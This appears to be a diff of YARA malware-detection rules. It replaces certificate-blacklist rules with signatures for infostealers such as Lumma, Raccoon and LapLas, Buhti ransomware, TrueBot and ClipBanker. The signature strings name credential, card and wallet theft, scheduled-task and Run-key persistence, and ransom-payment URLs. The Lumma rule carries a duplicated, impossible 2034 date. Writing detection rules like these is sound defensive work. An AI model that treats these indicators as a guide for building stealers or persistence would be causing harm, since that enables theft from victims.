-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LapLas Infostealer"
 		author = "ditekSHen"
-		id = "87f5a591-ed92-5ee8-99f8-04afe302609e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "bf2b0183-2b21-535a-896c-250fa448d090"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3698-L3709"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9584-L9612"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2687ec82b9c968dca91b8f54c600fae794d01be43a31cce4b0e6ef63672870fd"
+		logic_hash = "e4a1f39a539782118db9c4ab89d03e359420397ef970165389cc79e7ea0952b3"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "1103debcb1e48f7dda9cec4211c0a7a9c1764252"
-		importance = 20
+		clamav_sig1 = "MALWARE.Win.LapLas-DotNET"
+		clamav_sig2 = "MALWARE.Win.LapLas-GoLang"
+
+	strings:
+		$c1 = "/bot/" ascii
+		$c2 = "key=" ascii
+		$f1 = "main.isRunning" fullword ascii
+		$f2 = "main.writePid" fullword ascii
+		$f3 = "main.isStartupEnabled" fullword ascii
+		$f4 = "main.enableStartup" fullword ascii
+		$f5 = "main.waitOpenClipboard" fullword ascii
+		$f6 = "main.clipboardWrite" fullword ascii
+		$f7 = "main.setOnline" fullword ascii
+		$f8 = "main.getRegex" fullword ascii
+		$v2_1 = "{0}/bot/{1}?{2}" wide
+		$v2_2 = /\{0\}\\\{1\}\.(exe|pid)/ wide
+		$v2_3 = "schtasks /create /tn" wide
+		$v2_4 = "SetOnline" fullword ascii
+		$v2_5 = "IsAutoRunInstance" fullword ascii
+		$v2_6 = "GetNewAddress" fullword ascii
+		$v2_7 = "RefreshRegex" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "77:89:06:d4:06:95:f6:5b:a5:18:db:76:0d:f4:4c:d3" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $c* ) and 5 of ( $f* ) ) or ( 1 of ( $c* ) and 7 of ( $f* ) ) or ( 6 of ( $v2* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_45Eb9187A2505D8E6C842E6D366Ad0C8 : FILE
+rule DITEKSHEN_MALWARE_Win_Mystic : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for Mystic Infostealer"
 		author = "ditekSHen"
-		id = "75494bb2-fa70-5983-a75c-067b06c597e5"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "959eceab-0a2c-5361-b8f4-6739033ffae5"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3711-L3722"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9614-L9628"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a900017eb33db455b94e3474ce3a2f1ebf6416ff21477a464aba68d32fd7c938"
+		logic_hash = "26e0b85141df818d70124c0b19b5b6a05ac24ae679724d7a8ad94415a6462d17"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "63938d34572837514929fa7ae3cfebedf6d2cb65"
-		importance = 20
+
+	strings:
+		$s1 = "LaStFiLe:)" ascii wide
+		$s2 = "LaStPrOcEsS:)" ascii wide
+		$s3 = "credit_cards" ascii wide
+		$s4 = "number_of_processors" ascii wide
+		$s5 = "computername" ascii wide
+		$p1 = "G:\\Projects\\Python\\morpher\\" ascii wide
+		$p2 = /G:\\Projects\\stealer\\.{15}\\Release\\.{5,25}\.pdb/ ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BAKERA s.r.o." and pe.signatures [ i ] . serial == "45:eb:91:87:a2:50:5d:8e:6c:84:2e:6d:36:6a:d0:c8" )
+		( uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 1 of ( $p* ) and 3 of ( $s* ) ) ) ) or ( all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Cbc2Af7D82295A8535F3B26B47522640 : FILE
+rule DITEKSHEN_MALWARE_Linux_Buhti : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Buhti Ransomware"
 		author = "ditekSHen"
-		id = "d4f422a7-2b1c-5db0-ad9b-1eb8b3a75e3c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a50b8c34-e9e2-5466-80a1-b0ab805c68be"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3724-L3735"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9630-L9643"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d9fb9b36bc4370851fd0f54bb9fb05e02fc7a6288355b57073c31b1feade41e"
+		logic_hash = "1bab3202dbeaf088b233c3ab1056c357d156b7eef3111bea997b1c610a27f561"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "08d2c03d0959905b4b04caee1202b8ed748a8bd0"
-		importance = 20
+
+	strings:
+		$x1 = "buhtiRansom" ascii
+		$x2 = "://satoshidisk.com/pay/" ascii
+		$s1 = "main.encrypt_file" fullword ascii
+		$s2 = "/path/to/be/encrypted" ascii
+		$s3 = "Restore-My-Files.txt" ascii
+		$s4 = ".buhti390625" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eabfdafffefaccaedaec" and pe.signatures [ i ] . serial == "cb:c2:af:7d:82:29:5a:85:35:f3:b2:6b:47:52:26:40" )
+		uint16( 0 ) == 0x457f and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ca1D9391Cf5Fe3E696831D98D6C35A6 : FILE
+rule DITEKSHEN_MALWARE_Win_Commonmagic : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CommonMagic and Modules"
 		author = "ditekSHen"
-		id = "e2f026d6-031d-5058-a7f1-fc492ea47908"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "cbebe334-9b66-5931-8f92-25d080f7fd6a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3737-L3748"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9645-L9660"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4c60dea4fe28c2799dc88712275e62a795c848120c4b463109942b8d9bc29a81"
+		logic_hash = "e94ba53f31f3effe12b1fbaca19fea59c0e12f742f6fc0af2a0a679bf4299cbe"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0689776ca5ca0ca9641329dc29efdb61302d7378"
-		importance = 20
+
+	strings:
+		$p1 = "\\\\.\\pipe\\PipeMd" wide
+		$p2 = "\\\\.\\pipe\\PipeCrDtMd" wide
+		$p3 = "\\\\.\\pipe\\PipeDtMd" wide
+		$s1 = "graph.microsoft.com" fullword wide
+		$s2 = "CreateNamedPipe" ascii
+		$s3 = "\\CommonCommand\\" wide
+		$ua1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36" wide
+		$ua2 = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "www.norton.com" and pe.signatures [ i ] . serial == "0c:a1:d9:39:1c:f5:fe:3e:69:68:31:d9:8d:6c:35:a6" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $p* ) and 1 of ( $s* ) ) or ( 1 of ( $ua* ) and 1 of ( $s* ) and 1 of ( $p* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_43A36A26Ebc78E111A874D8211A95E3F : FILE
+rule DITEKSHEN_MALWARE_Win_Greetingghoul : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GreetingGhoul Cryptocurrency Infostealer"
 		author = "ditekSHen"
-		id = "651ca649-c707-59d2-b482-5ca6d1e569b0"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "42791b26-1cda-5bf3-b955-9de2dda1d63b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3750-L3761"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9662-L9679"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2588c91e1cce7e595e4237843b03f3e65427b4c3ea634e9a4f8249e9c9f49dbe"
+		logic_hash = "5a2635066df031ba6e291c3ba14f9ed85bf3247c82c66eb1b3d3618fdebb47a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a346bda33b5b3bea04b299fe87c165c4f221645a"
-		importance = 20
+
+	strings:
+		$s1 = "peer_list" fullword ascii
+		$s2 = "seed_hash" fullword ascii
+		$s3 = "pool_id" fullword ascii
+		$s4 = "%smutex=%s:%lu" ascii
+		$s5 = "miner.cfg" fullword ascii
+		$s6 = "{\"method\": \"%s\"%s}" ascii
+		$s7 = "/app/manager/%s" ascii
+		$s8 = "X-VNC-STATUS" fullword ascii
+		$s9 = "%s\\%lu.zip" fullword ascii
+		$s10 = "\\??\\%programdata%\\" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Efacefcafeabbdcbcea" and pe.signatures [ i ] . serial == "43:a3:6a:26:eb:c7:8e:11:1a:87:4d:82:11:a9:5e:3f" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5172Caa2119185382343Fcbe09C43Bee : FILE
+rule DITEKSHEN_MALWARE_Win_Multi_Family_Infostealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Prynt, WorldWind, DarkEye, Stealerium and ToxicEye / TelegramRAT infostealers"
 		author = "ditekSHen"
-		id = "54f38317-2d36-54ec-a3fc-04f8b0fc5529"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "960830ba-df0d-539d-be2a-7778229f79bd"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3763-L3774"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9681-L9703"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7aa1447bd0ac43ac29ed69bd6618c3695bfb50517a7ffce7d4e793ae0c5e0fa6"
+		logic_hash = "0fdd1cdc4f2e5bee6c763e6e6b2e79d85285e44e2b5e3168a56d7d360252ee99"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "fd9b3f6b0eb9bd9baf7cbdc79ae7979b7ddad770"
-		importance = 20
+
+	strings:
+		$n1 = /Prynt|WorldWind|DarkEye(\s)?Stealer/ ascii wide
+		$n2 = "Stealerium" ascii wide
+		$x1 = "@FlatLineStealer" ascii wide
+		$x2 = "@CashOutGangTalk" ascii wide
+		$x3 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii
+		$x4 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii
+		$s1 = "Timeout /T 2 /Nobreak" fullword wide
+		$s2 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide
+		$s3 = "Downloading file: \"{file}\"" wide
+		$s4 = "/bot{0}/getUpdates?offset={1}" wide
+		$s5 = "send command to bot!" wide
+		$s6 = " *Keylogger " fullword wide
+		$s7 = "*Stealer" wide
+		$s8 = "Bot connected" wide
+		$s9 = "### {0} ### ({1})" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aefcdac" and pe.signatures [ i ] . serial == "51:72:ca:a2:11:91:85:38:23:43:fc:be:09:c4:3b:ee" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_009245D1511923F541844Faa3C6Bfebcbe : FILE
+rule DITEKSHEN_MALWARE_Win_Darkeye : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DarkEye infostealer"
 		author = "ditekSHen"
-		id = "db876459-a0d2-542f-8f7e-a486ba68aeb4"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "5296fe28-b54e-5d0f-aa2f-2050db585d82"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3776-L3787"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9751-L9770"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d2c186b3aaaf353857e67ffd51a785e674335e824be78fc1c2ae1b9a0532eae"
+		logic_hash = "5496dcbfe075a4030a446027765186e9dd1931561a29a481139281e1708ce87d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "509cbd2cd38ae03461745c7d37f6bbe44c6782cf"
-		importance = 20
+
+	strings:
+		$c1 = /Prynt(\s)?Stealer/ ascii wide
+		$c2 = /WorldWind(\s)?Stealer/ ascii wide
+		$c3 = "ToxicEye" ascii wide
+		$x2 = "@FlatLineStealer" ascii wide
+		$x3 = "@CashOutGangTalk" ascii wide
+		$s1 = "--- Clipper" wide
+		$s2 = "Downloading file: \"{file}\"" wide
+		$s3 = "/bot{0}/getUpdates?offset={1}" wide
+		$s4 = "send command to bot!" wide
+		$s5 = " *Keylogger " fullword wide
+		$s6 = "*Stealer" wide
+		$s7 = "Bot connected" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEHTEH d.o.o.," and pe.signatures [ i ] . serial == "00:92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" )
+		uint16( 0 ) == 0x5a4d and not any of ( $c* ) and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E161F76Da3B5E4623892C8E6Fda1Ea3D : FILE
+rule DITEKSHEN_MALWARE_Win_Invalidprinter : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Invalid Printer (in2al5d p3in4er) Loader"
 		author = "ditekSHen"
-		id = "a010cf24-b29a-5613-8122-92ced507564f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "9b0a59e1-8105-5687-83b2-fb96229f59f9"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3789-L3800"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9772-L9782"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7aae91e2873633989b3716930354361ee56d7fd7af35e105ae15ed6bf87de67a"
+		logic_hash = "d14d53b2a73952244641f4e68a3dd5af8cb1e2bfc5936f300f9347b4881ceeb8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "df5fbfbfd47875b580b150603de240ead9c7ad27"
-		importance = 20
+		clamav_sig = "MALWARE.Win.InvalidPrinter"
+
+	strings:
+		$s1 = "in2al5d p3in4er" fullword ascii
+		$s2 = "CreateDXGIFactory" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TGN Nedelica d.o.o." and pe.signatures [ i ] . serial == "00:e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" )
+		uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_009Faf8705A3Eaef9340800Cc4Fd38597C : FILE
+rule DITEKSHEN_MALWARE_Win_Raccoonv2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Raccoon Stealer 2.0, also referred to as RecordBreaker"
 		author = "ditekSHen"
-		id = "5b85e806-6b13-5356-a225-23399b947114"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "2fc8313f-42f4-5b7e-8ae6-20455f736064"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3802-L3813"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9784-L9805"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "41c6561ef50950c7a5b4107b788e0469f77b9905b777edb24501649e4c313bd6"
+		logic_hash = "d47bb9051923147010452bcd6e7c370c2ff9ea9095bcb920b64f69873b15ec16"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "40c572cc19e7ca4c2fb89c96357eff4c7489958e"
-		importance = 20
+
+	strings:
+		$f1 = "sgnl_" fullword ascii
+		$f2 = "tlgrm_" fullword ascii
+		$f3 = "ews_" fullword ascii
+		$f4 = "grbr_" fullword ascii
+		$f5 = "dscrd_" fullword ascii
+		$f6 = "wlts_" fullword ascii
+		$f7 = "scrnsht_" fullword ascii
+		$f8 = "sstmnfo_" fullword ascii
+		$s1 = "machineId=" fullword ascii
+		$s2 = "&configId=" fullword ascii
+		$s3 = "URL:%s" fullword ascii
+		$s4 = "USR:%s" fullword ascii
+		$s5 = "PASS:%s" fullword ascii
+		$s6 = "Content-Type: application/x-object" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tekhnokod LLC" and pe.signatures [ i ] . serial == "00:9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" )
+		(( uint16( 0 ) == 0x5a4d and ( 4 of ( $f* ) or all of ( $s* ) or 7 of them ) ) or 10 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : FILE
+rule DITEKSHEN_MALWARE_Win_Truebot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects TrueBot"
 		author = "ditekSHen"
-		id = "4c3153e4-d3ce-5e87-8e72-969cba972e26"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7210a0bd-d310-55bf-bb0c-14cadb59bd67"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3815-L3826"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9807-L9827"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5e0d1b74422ae1004b0054c161d1dc949bb368ac17575e33c9b6d550bb136126"
+		logic_hash = "a92141ef0aa7d68b3594a0f56c0370498fe5751a472c9011ac8b92ae46e88e53"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "eb5f5ab7294ba39f2b77085f47382bd7e759ff3a"
-		importance = 20
+
+	strings:
+		$s1 = "%s\\rundll32.exe" fullword wide
+		$s2 = "ChkdskExs" fullword wide
+		$s3 = "n=%s&o=%s&a=%d&u=%s&p=%s&d=%s" ascii
+		$s4 = "KLLS" fullword ascii
+		$s5 = "%s\\%08x-%08x.ps1" fullword ascii
+		$s6 = ".JSONIP" ascii
+		$s7 = "CreateProcessAsUserW res %d err %d" fullword ascii
+		$s8 = "ldr_sys64.dll" fullword ascii
+		$s9 = "SVCHOST" fullword ascii
+		$s10 = "WINLOGON" fullword ascii
+		$s11 = { 67 6f 6f 67 6c 65 2e 63 6f 6d 00 00 00 00 00 00
+                2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00
+                20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lotte Schmidt" and pe.signatures [ i ] . serial == "28:88:cf:0f:95:3a:4a:36:40:ee:4c:fc:63:04:d9:d4" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C8Edcfe8Be174C2F204D858C5B91Dea5 : FILE
+rule DITEKSHEN_MALWARE_Win_Lummastealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Lumma Stealer"
 		author = "ditekSHen"
-		id = "196da268-b9a3-562c-ad68-67d17ea94ccf"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b54521ab-4a31-5c1c-8ef2-b08b0f713693"
+		date = "2034-02-17"
+		date = "2034-02-17"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3828-L3839"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9829-L9854"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "56801a71547218413ab48381c412a8e1b7fd41a9f7a7c85dc6debdc38a19d6c4"
+		logic_hash = "74014c5bcc85977b90faed93b348c34e47ee033b06c2f145348ca9c54c27bda5"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "7f5f205094940793d1028960e0f0e8b654f9956e"
-		importance = 20
+		clamav1 = "MALWARE.Win.Trojan.LummaStealer"
+
+	strings:
+		$x1 = /Lum[0-9]{3}xedmaC2,\sBuild/ ascii
+		$x2 = /LID\(Lu[0-9]{3}xedmma\sID\):/ ascii
+		$s1 = /os_c[0-9]{3}xedrypt\.encry[0-9]{3}xedpted_key/ fullword ascii
+		$s2 = "c2sock" wide
+		$s3 = "c2conf" wide
+		$s4 = "TeslaBrowser/" wide
+		$s5 = "Software.txt" fullword wide
+		$s6 = "SysmonDrv" fullword
+		$s7 = "*.eml" fullword wide nocase
+		$s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
+		$s9 = "- Screen Resoluton:" ascii
+		$s10 = "lid=%s" ascii
+		$s11 = "&ver=" ascii
+		$s12 = "769cb9aa22f4ccc412f9cbc81feedd" fullword wide
+		$s13 = "gapi-node.io" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Paarcopy Oy" and pe.signatures [ i ] . serial == "00:c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or 5 of ( $s* ) or 7 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1A311630876F694Fe1B75D972A953Bca : FILE
+rule DITEKSHEN_MALWARE_Win_Clipbanker03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ClipBanker"
 		author = "ditekSHen"
-		id = "2a39397f-1585-5f7f-a2a9-aab62d29a2b2"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "57ba7d33-eba4-5bc1-9893-5441e439b900"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3841-L3852"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9884-L9904"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f14532caf49e6f46f75e42e334d3170db0ebebfe75c9f3e057c237691b5d86a2"
+		logic_hash = "29bbb833c9aecc18b398b8c0d80649994f4992277d1aa2ee4ae8e319b59125d5"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "d473ec0fe212b7847f1a4ee06eff64e2a3b4001e"
-		importance = 20
+
+	strings:
+		$s1 = "UNIC_KEY" fullword wide
+		$s2 = "[StartUp]" fullword wide
+		$s3 = "[Kill]" fullword wide
+		$s4 = "[antivm]" fullword wide
+		$s5 = "AntiVM" fullword ascii
+		$s6 = "AntiKill" fullword ascii
+		$s7 = "hWndRemove" fullword ascii
+		$s8 = "/Clip(watch|Chang|Mon)/" fullword ascii
+		$w1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide
+		$w2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" fullword wide
+		$w3 = "/create /sc MINUTE /mo 1 /tn \"Windows Service\" /tr \"" fullword wide
+		$w4 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" fullword wide
+		$w5 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GTEC s.r.o." and pe.signatures [ i ] . serial == "1a:31:16:30:87:6f:69:4f:e1:b7:5d:97:2a:95:3b:ca" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $w* ) or 6 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00A496Bc774575C31Abec861B68C36Dcb6 : FILE
+rule DITEKSHEN_MALWARE_Win_Dotrunpex : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects dotRunpeX injector"
 		author = "ditekSHen"
-		id = "2415bf62-15d4-562a-a448-682474d89af0"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4845edc1-110c-59a2-ace0-57a62b1e69e8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3854-L3865"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9906-L9918"
